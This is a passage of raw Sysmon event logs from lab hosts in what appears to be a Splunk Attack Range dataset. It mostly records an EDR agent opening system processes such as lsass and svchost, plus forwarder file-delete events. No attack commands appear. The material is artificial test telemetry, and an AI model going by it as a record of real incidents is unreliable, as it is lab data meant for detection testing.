Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015623Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.748{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015622Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015621Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015620Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.736{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015619Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.736{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015618Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015617Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015616Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015615Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.719{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015614Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.717{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015613Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.709{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015612Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.705{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015611Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.691{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015610Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.686{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015609Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.657{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015608Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.649{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015607Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.640{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015606Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.632{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015605Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.618{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015604Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.584{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015603Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.578{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015602Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.573{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015601Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.565{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015600Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.555{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015599Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.549{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015598Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.540{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015597Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.537{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 23542300x800000000000000015596Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:42.536{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8301472BB635804C341A3A575F745ACE,SHA256=B2EEEE6C28173A93B797F9DB319CE024AA7DC169566458600E5E2878B13FD71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:42.597{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=884EF0F3668B10BCE56FD34E1EB5DFDA,SHA256=2CFBE45F994F1F1FA0AD6A147C0BB6660DDD327AEBAAC1E57A4B9A6BB272EAE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:42.588{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-040MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:39.531{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56252-false10.0.1.12-8000- 23542300x800000000000000015628Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:43.960{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58409BA00984072385297EBBB519F26B,SHA256=AA8BCF5025F882AEB29BA4E5951B1652B6F5FB88CB36D3E3EE30170A494E83D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:43.671{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8918E33CC8E8E897B2DE221F3226334,SHA256=760C6C9CA10FFC2EB4AAF00B1FA59C2D0164EB7722DDB1B16107EB3D61B8E994,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:44.736{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DFC98784AF6058DAAAAFCF1CBA7A458,SHA256=F5DF8DE942F7A84087000A0CF6BAB465C8FC4CCEEABD66CCD77CAC3BF3343282,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:45.828{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 